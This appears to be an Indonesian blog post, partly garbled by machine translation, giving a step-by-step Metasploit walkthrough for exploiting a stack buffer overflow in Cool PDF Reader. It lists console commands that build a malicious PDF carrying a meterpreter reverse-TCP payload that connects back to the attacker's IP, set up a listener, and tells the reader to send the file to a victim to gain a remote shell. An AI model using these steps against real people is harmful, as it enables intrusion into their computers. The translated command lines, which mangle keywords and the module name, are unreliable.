Modul ini memanfaatkan stack buffer overflow Cool PDF Reader sebelum versi 3.0.2.256. Kerentanan dipicu ketika membuka file PDF cacat yang berisi aliran gambar khusus dibuat. Modul ini telah diuji dengan sukses tentang Cool PDF 3.0.2.256 atas Windows XP SP3 dan Windows 7 SP
Exploit Target
Windows 7
Keren PDF 3.0.2.256
Kebutuhan
Penyerang : Kali Linux
Korban PC : Windows 7
Buka Kali Linux tipe terminal msfconsole
Sekarang ketik penggunaan mengeksploitasi / windows / fileformat / coolpdf_image_strem_bof
msf exploit ( coolpdf_image_strem_bof )> jendela set payload / meterpreter / reverse_tcp
msf exploit ( coolpdf_image_strem_bof )> set LHOST 192.168.0.107 (IP Host lokal)
msf exploit ( coolpdf_image_strem_bof )> mengeksploitasi
Setelah kami berhasil menghasilkan s3m file berbahaya, itu akan disimpan di komputer lokal Anda
/ Root/.msf4/local/msf.pdf
Sekarang kita perlu mengatur pendengar untuk menangani koneksi terbalik dikirim oleh korban ketika mengeksploitasi berhasil dieksekusi.
menggunakan mengeksploitasi / multi-/ handler
Jendela set payload / meterpreter / reverse_tcp
set LHOST 192.168.0.107
mengeksploitasi
Sekarang mengirim Anda msf.pdf file ke korban, segera setelah mereka men-download dan membukanya. Sekarang Anda dapat mengakses meterpreter shell pada komputer korban.
Goodluck...
Sekian dari saya, semoga bermanfat. :D
Content Creator : Antar Prasetya Yoga
Sekian dari saya, semoga bermanfat. :D
Content Creator : Antar Prasetya Yoga
0 comments:
Post a Comment